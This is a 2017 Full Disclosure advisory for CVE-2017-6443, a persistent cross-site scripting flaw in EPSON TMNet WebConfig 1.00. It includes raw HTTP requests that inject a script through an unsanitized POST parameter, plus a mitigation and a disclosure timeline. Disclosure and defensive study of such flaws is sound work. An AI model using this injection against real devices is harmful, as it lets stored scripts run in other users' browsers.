[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] CVE-2017-6443: Persistent XSS in EPSON TMNet WebConfig Ver. 1.00
- To: "fulldisclosure@xxxxxxxxxxxx" <fulldisclosure@xxxxxxxxxxxx>
- Subject: [FD] CVE-2017-6443: Persistent XSS in EPSON TMNet WebConfig Ver. 1.00
- From: Michael Benich <benichmt1@xxxxxxxxxxxxxx>
- Date: Fri, 03 Mar 2017 12:13:18 -0500
Summary: Persistent cross-site scripting (XSS) in the web interface of Epson's
TMNet WebConfig Ver 1.00 application allows a remote attacker to introduce
arbitary Javascript via manipulation of an unsanitized POST parameter.
------------------------------------------------------------------------
Vendor: EPSON
------------------------------------------------------------------------
Software Link:
https://c4b.epson-biz.com/modules/community/index.php?content_id=50
------------------------------------------------------------------------
Version: 1.00
------------------------------------------------------------------------
Identifier: CVE-2017-6443
------------------------------------------------------------------------
Exploit Author: Michael Benich
Contact: benichmt1 [at] protonmail.com or @benichmt1
------------------------------------------------------------------------
PoC:
1) Make a POST request using a proxy application like Burp
------------------------------------------------------------------------
POST /Forms/oadmin_1 HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:50.0) Gecko/20100101
Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://XXX.XXX.XXX.XXX/oadmin.htm
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
W_AD1=<script>window.alert(0)</script>&W_Link1=&Submit=SUBMIT
------------------------------------------------------------------------
2) Browsing to the main page will execute your script. This remains persistent
for any user who then visits this page.
GET /istatus.htm HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:50.0) Gecko/20100101
Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://XXX.XXX.XXX.XXX/side.htm
Connection: close
Upgrade-Insecure-Requests: 1
------------------------------------------------------------------------
Mitigation:
The application by default ships without a password - consider adding strong
authentication to this portal.
------------------------------------------------------------------------
Timeline:
------------------------------------------------------------------------
12/1/2016 - Discovery.
12/9/2016 - Emailed support@ , info@ , and domain-admin@ emails. No response.
12/16/2016 - Pinged on Twitter. Recommended to contact through support.
12/22/2016 - Reached on LinkedIn directly to individual listed as Security
Engineer and asked to find proper security contact channel. No response, but
the connection request was accepted.
3/3/2017 - Disclosure
------------------------------------------------------------------------
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/